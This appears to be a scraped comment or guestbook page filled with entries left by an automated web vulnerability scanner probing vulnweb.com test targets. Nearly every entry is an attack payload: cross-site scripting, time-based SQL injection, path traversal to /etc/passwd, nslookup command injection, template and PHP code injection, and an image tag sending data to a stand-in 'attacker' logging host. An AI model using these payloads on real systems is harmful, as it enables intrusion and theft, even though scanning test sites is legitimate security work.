e [116.113.93.82] 2020-10-28 21:56:35

1

e [116.113.93.82] 2020-10-28 21:56:35

set|set&set

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 21:56:35

1

e [Array] 2020-10-28 21:56:34

1

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 21:56:34

1

e [116.113.93.82] 2020-10-28 21:56:34

${9999548+9999283}

e [-1' OR 2+123-123-1=0+0+0+1 or 'c3UIXqFl'='] 2020-10-28 21:56:34

1

e [116.113.93.82] 2020-10-28 21:56:34

'+response.write(9917702*9045824)+'

e [116.113.93.82] 2020-10-28 21:56:34

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [1some_inexistent_file_with_long_name.82] 2020-10-28 21:56:34

1

e [Array] 2020-10-28 21:56:34

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 21:56:34

1

e [-1' OR 2+353-353-1=0+0+0+1 -- ] 2020-10-28 21:56:33

1

e [116.113.93.82] 2020-10-28 21:56:33

response.write(9917702*9045824)

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 21:56:33

1

e [12345'"\'\");|]*{ <>] 2020-10-28 21:56:33

1

e [${10000025+9999749}] 2020-10-28 21:56:33

1

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 21:56:33

1

e [-1 OR 2+414-414-1=0+0+0+1] 2020-10-28 21:56:32

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 21:56:32

1

e [] 2020-10-28 21:56:32

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 21:56:32

1

e [&nslookup KhVKeJ5l&'\"`0&nslookup KhVKeJ5l&`'] 2020-10-28 21:56:31

1

e [-1 OR 2+706-706-1=0+0+0+1 -- ] 2020-10-28 21:56:31

1

e [116.113.93.82] 2020-10-28 21:56:31

8ZknqWnd

e [$(nslookup 3nv8wALB)] 2020-10-28 21:56:30

1

e [Rn4fKRv3] 2020-10-28 21:56:30

1

e ["+response.write(9942520*9770864)+"] 2020-10-28 21:56:29

1

e [116.113.93.82] 2020-10-28 21:56:29

1

e [qumdgpH4] 2020-10-28 21:56:29

1

e [set|set&set] 2020-10-28 21:56:29

1

e ['+response.write(9942520*9770864)+'] 2020-10-28 21:56:28

1

e [116.113.93.82] 2020-10-28 21:56:28

1

e [response.write(9942520*9770864)] 2020-10-28 21:56:27

1

e [116.113.93.82] 2020-10-28 21:55:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:06:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:06:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:06:20

1

GRLpGpAG"><script>hHbY(9299)</script> [116.113.93.82] 2020-10-28 19:06:17

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(hHbY(9454))'bad=" [116.113.93.82] 2020-10-28 19:06:14

1

[116.113.93.82] 2020-10-28 19:06:11

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%68%48%62%59%28%39%32%32%30%29%22 [116.113.93.82] 2020-10-28 19:06:08

1

GRLpGpAG\u0022onmouseover=hHbY(9341)\u0022 [116.113.93.82] 2020-10-28 19:06:05

1

GRLpGpAG" 1aFE=hHbY([!+!]) Qn3=" [116.113.93.82] 2020-10-28 19:06:03

1

GRLpGpAG"onmouseover=hHbY(9470)" [116.113.93.82] 2020-10-28 19:06:00

1

GRLpGpAG<SSDjby< [116.113.93.82] 2020-10-28 19:05:58

1

GRLpGpAG<img sRc='http://attacker-9562/log.php? [116.113.93.82] 2020-10-28 19:05:54

1

GRLpGpAG<LE2YDp x=9809> [116.113.93.82] 2020-10-28 19:05:51

1

GRLpGpAG<ifRAme sRc=9426.com></IfRamE> [116.113.93.82] 2020-10-28 19:05:49

1

GRLpGpAG<WSGEDZ>QCOF7[!+!]</WSGEDZ> [116.113.93.82] 2020-10-28 19:05:45

1

GRLpGpAG6pPDb <ScRiPt >hHbY(9795)</ScRiPt> [116.113.93.82] 2020-10-28 19:05:42

1

GRLpGpAG<% contenteditable onresize=hHbY(9984)> [116.113.93.82] 2020-10-28 19:05:39

1

GRLpGpAG}body{acu:Expre/**/SSion(hHbY(9558))} [116.113.93.82] 2020-10-28 19:05:37

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9847);//><!-- --> [116.113.93.82] 2020-10-28 19:05:35

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 19:05:31

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 19:05:29

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 19:05:26

1

GRLpGpAG<input autofocus onfocus=hHbY(9548)> [116.113.93.82] 2020-10-28 19:05:23

1

[116.113.93.82] 2020-10-28 19:05:20

1

GRLpGpAG<ScRiPt>hHbY(9465)</sCripT> [116.113.93.82] 2020-10-28 19:05:18

1

GRLpGpAG\u003CScRiPt\hHbY(9889)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 19:05:15

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%68%48%62%59%289959%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 19:05:12

1

GRLpGpAG<img/src=">" onerror=alert(9224)> [116.113.93.82] 2020-10-28 19:05:09

1

GRLpGpAG<img src=xyz OnErRor=hHbY(9744)> [116.113.93.82] 2020-10-28 19:05:06

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=hHbY(9037)> [116.113.93.82] 2020-10-28 19:05:03

1

GRLpGpAG<body onload=hHbY(9006)> [116.113.93.82] 2020-10-28 19:05:00

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9603'> [116.113.93.82] 2020-10-28 19:04:58

1

GRLpGpAG<isindex type=image src=1 onerror=hHbY(9824)> [116.113.93.82] 2020-10-28 19:04:55

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 19:04:52

1

GRLpGpAG<video><source onerror="javascript:hHbY(9410)"> [116.113.93.82] 2020-10-28 19:04:50

1

GRLpGpAG<ScRiPt >hHbY(9678)</ScRiPt> [116.113.93.82] 2020-10-28 19:04:47

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9156></ScRiPt> [116.113.93.82] 2020-10-28 19:04:44

1

GRLpGpAG<ScRiPt >hHbY(9614)</ScRiPt> [116.113.93.82] 2020-10-28 19:04:41

1

GRLpGpAG<ScR<ScRiPt>IpT>hHbY(9326)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 19:04:38

1

GRLpGpAG<script>hHbY(9500)</script> [116.113.93.82] 2020-10-28 19:04:36

1

GRLpGpAG<WVWUAF>QQYBF[!+!]</WVWUAF> [116.113.93.82] 2020-10-28 19:04:33

1

GRLpGpAG<ScRiPt >hHbY(9227)</ScRiPt> [116.113.93.82] 2020-10-28 19:04:30

1

{{9999742*9999662}} [116.113.93.82] 2020-10-28 19:04:27

1

acux10299 [116.113.93.82] 2020-10-28 19:04:24

1

acu5883<s1﹥s2ʺs3ʹuca5883 [116.113.93.82] 2020-10-28 19:04:20

1

{{9999521*10000266}} [116.113.93.82] 2020-10-28 19:04:18

1

acux8740 [116.113.93.82] 2020-10-28 19:04:15

1

acu8100<s1﹥s2ʺs3ʹuca8100 [116.113.93.82] 2020-10-28 19:04:11

1

GRLpGpAG9568233 [116.113.93.82] 2020-10-28 19:04:09

1

'"()&%<acx><ScRiPt >hHbY(9479)</ScRiPt> [116.113.93.82] 2020-10-28 19:04:06

1

GRLpGpAG'"()&%<acx><ScRiPt >hHbY(9020)</ScRiPt> [116.113.93.82] 2020-10-28 19:04:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:04:00

1<6t1PLL<

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:57

1<img sRc='http://attacker-9205/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:54

1<MxHkYH x=9955>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:51

1<ifRAme sRc=9937.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:48

1<W0RVNZ>MZPIX[!+!]</W0RVNZ>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:45

1mAVoX <ScRiPt >hHbY(9578)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:42

1<% contenteditable onresize=hHbY(9605)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:39

1}body{acu:Expre/**/SSion(hHbY(9423))}

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:36

1<img<!-- --> src=x onerror=alert(9738);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:33

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:30

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:27

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:24

1<input autofocus onfocus=hHbY(9184)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:21

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:18

1<ScRiPt>hHbY(9522)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:15

1\u003CScRiPt\hHbY(9737)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:11

%31%3C%53%63%52%69%50%74%20%3E%68%48%62%59%289217%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:09

1<img/src=">" onerror=alert(9590)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:07

1<img src=xyz OnErRor=hHbY(9377)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:04

1<img src=//testasp.vulnweb.com/t/dot.gif onload=hHbY(9953)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:03:01

1<body onload=hHbY(9765)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:58

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9579'>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:55

1<isindex type=image src=1 onerror=hHbY(9699)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:52

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:50

1<video><source onerror="javascript:hHbY(9037)">

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:47

1<ScRiPt >hHbY(9546)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:44

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9519></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:41

1<ScRiPt >hHbY(9646)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:38

1<ScR<ScRiPt>IpT>hHbY(9459)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:35

1<script>hHbY(9621)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:32

1<WSNGRL>NRHWO[!+!]</WSNGRL>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:29

1<ScRiPt >hHbY(9703)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:26

{{9999034*9999394}}

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:23

acux6032

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:20

acu8103<s1﹥s2ʺs3ʹuca8103

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:17

19327755

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:14

'"()&%<acx><ScRiPt >hHbY(9598)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:02:09

1'"()&%<acx><ScRiPt >hHbY(9920)</ScRiPt>

GRLpGpAG [116.113.93.82<e82Ixf<] 2020-10-28 19:02:03

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9013/log.php?] 2020-10-28 19:02:00

1

GRLpGpAG [116.113.93.82<7peudv x=9469>] 2020-10-28 19:01:58

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9364.com></IfRamE>] 2020-10-28 19:01:55

1

GRLpGpAG [116.113.93.82<W5JBWC>WPB4B[!+!]</W5JBWC>] 2020-10-28 19:01:52

1

GRLpGpAG [116.113.93.822Sey2 <ScRiPt >hHbY(9980)</ScRiPt>] 2020-10-28 19:01:49

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=hHbY(9258)>] 2020-10-28 19:01:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:44

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(hHbY(9831))}] 2020-10-28 19:01:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:41

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9777);//><!-- -->] 2020-10-28 19:01:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:39

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 19:01:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:36

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 19:01:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:31

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 19:01:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:29

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=hHbY(9294)>] 2020-10-28 19:01:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:26

1

GRLpGpAG [] 2020-10-28 19:01:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:23

1

GRLpGpAG [116.113.93.82<ScRiPt>hHbY(9986)</sCripT>] 2020-10-28 19:01:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:19

1

GRLpGpAG [116.113.93.82\u003CScRiPt\hHbY(9101)\u003C/sCripT\u003E] 2020-10-28 19:01:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:17

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%68%48%62%59%289880%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 19:01:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:13

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9520)>] 2020-10-28 19:01:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:11

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:10

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=hHbY(9203)>] 2020-10-28 19:01:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:08

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=hHbY(9467)>] 2020-10-28 19:01:07

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 19:01:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:07

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 19:01:06

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 19:01:04

1

GRLpGpAG [116.113.93.82<body onload=hHbY(9832)>] 2020-10-28 19:01:04

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9463'>] 2020-10-28 19:01:01

1

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=hHbY(9171)>] 2020-10-28 19:00:59

1

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 19:00:56

1

GRLpGpAG [116.113.93.82<video><source onerror="javascript:hHbY(9712)">] 2020-10-28 19:00:53

1

GRLpGpAG [116.113.93.82<ScRiPt >hHbY(9617)</ScRiPt>] 2020-10-28 19:00:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:49

1

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9669></ScRiPt>] 2020-10-28 19:00:48

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 19:00:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:48

1

file:///etc/passwd [116.113.93.82] 2020-10-28 19:00:47

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 19:00:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:45

1

GRLpGpAG [116.113.93.82<ScRiPt >hHbY(9271)</ScRiPt>] 2020-10-28 19:00:45

1

.. [116.113.93.82] 2020-10-28 19:00:45

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 19:00:44

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 19:00:42

1

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>hHbY(9916)</sCr<ScRiPt>IpT>] 2020-10-28 19:00:42

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 19:00:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:40

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 19:00:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:40

1

GRLpGpAG [116.113.93.82<script>hHbY(9464)</script>] 2020-10-28 19:00:40

1

/etc/passwd [116.113.93.82] 2020-10-28 19:00:39

1

Axn0wQcC'));select pg_sleep(6); -- [116.113.93.82] 2020-10-28 19:00:39

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 19:00:38

1

67thnblV');select pg_sleep(6); -- [116.113.93.82] 2020-10-28 19:00:38

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 19:00:38

1

bDXGP7Kf';select pg_sleep(6); -- [116.113.93.82] 2020-10-28 19:00:37

1

GRLpGpAG [116.113.93.82<W8PQYW>NU5CL[!+!]</W8PQYW>] 2020-10-28 19:00:37

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 19:00:36

1

CLVzY6cK'; waitfor delay '0:0:3' -- [116.113.93.82] 2020-10-28 19:00:36

1

[116.113.93.82] 2020-10-28 19:00:35

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 19:00:35

1

1 waitfor delay '0:0:9' -- [116.113.93.82] 2020-10-28 19:00:35

1

[116.113.93.82] 2020-10-28 19:00:34

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 19:00:34

1

GRLpGpAG [116.113.93.82<ScRiPt >hHbY(9063)</ScRiPt>] 2020-10-28 19:00:34

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ [116.113.93.82] 2020-10-28 19:00:33

1

JyI= [116.113.93.82] 2020-10-28 19:00:33

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 19:00:33

1

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z [116.113.93.82] 2020-10-28 19:00:32

1

@@vD0X1 [116.113.93.82] 2020-10-28 19:00:32

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 19:00:32

1

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z [116.113.93.82] 2020-10-28 19:00:31

1

GRLpGpAG [{{9999290*9999464}}] 2020-10-28 19:00:31

1

1 [116.113.93.82] 2020-10-28 19:00:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:30

WEB-INF\web.xml

if(now()=sysdate(),sleep(6),0) [116.113.93.82] 2020-10-28 19:00:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:30

WEB-INF/web.xml

\ [116.113.93.82] 2020-10-28 19:00:29

1

-1" OR 2+741-741-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 19:00:29

1

1'" [116.113.93.82] 2020-10-28 19:00:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:29

/WEB-INF/web.xml

-1' OR 2+739-739-1=0+0+0+1 or '13DNdGnL'=' [116.113.93.82] 2020-10-28 19:00:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:28

GRLpGpAG [acux7468] 2020-10-28 19:00:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:28

/\../\../\../\../\../\../\../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:28

1

-1' OR 2+785-785-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 19:00:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:27

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:27

file:///etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:26

1

-1 OR 2+307-307-1=0+0+0+1 [116.113.93.82] 2020-10-28 19:00:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:26

JyI=

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:25

1

GRLpGpAG [acu4489<s1﹥s2ʺs3ʹuca4489] 2020-10-28 19:00:25

1

-1 OR 2+646-646-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 19:00:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:24

@@VGWGX

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:24

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:24

..

GkDxmaxQ [116.113.93.82] 2020-10-28 19:00:24

1

<!-- [116.113.93.82] 2020-10-28 19:00:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:22

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:22

1

'" [116.113.93.82] 2020-10-28 19:00:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:22

\

GRLpGpAG [116.113.93.829005318] 2020-10-28 19:00:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:21

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:21

<!--

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:21

1'"

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:20

ifiVPdCL'));select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:20

'"

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:20

/.././.././.././.././.././.././.././../etc/./passwd%00

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:19

F6DNTzal');select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:19

%2fetc%2fpasswd

/www.vulnweb.com [116.113.93.82] 2020-10-28 19:00:19

1

GRLpGpAG ['"()&%<acx><ScRiPt >hHbY(9975)</ScRiPt>] 2020-10-28 19:00:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:18

swdyzf1q';select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:18

/etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:18

/www.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:18

-1));select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:17

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GRLpGpAG [<!--] 2020-10-28 19:00:17

1

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 19:00:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:17

-1);select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:16

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG ['"] 2020-10-28 19:00:16

1

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 19:00:16

1

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >hHbY(9991)</ScRiPt>] 2020-10-28 19:00:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:16

-1;select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:15

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 19:00:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:15

sc45jqch'; waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:15

1

create/. [116.113.93.82] 2020-10-28 19:00:14

1

GRLpGpAG [/www.vulnweb.com] 2020-10-28 19:00:14

1

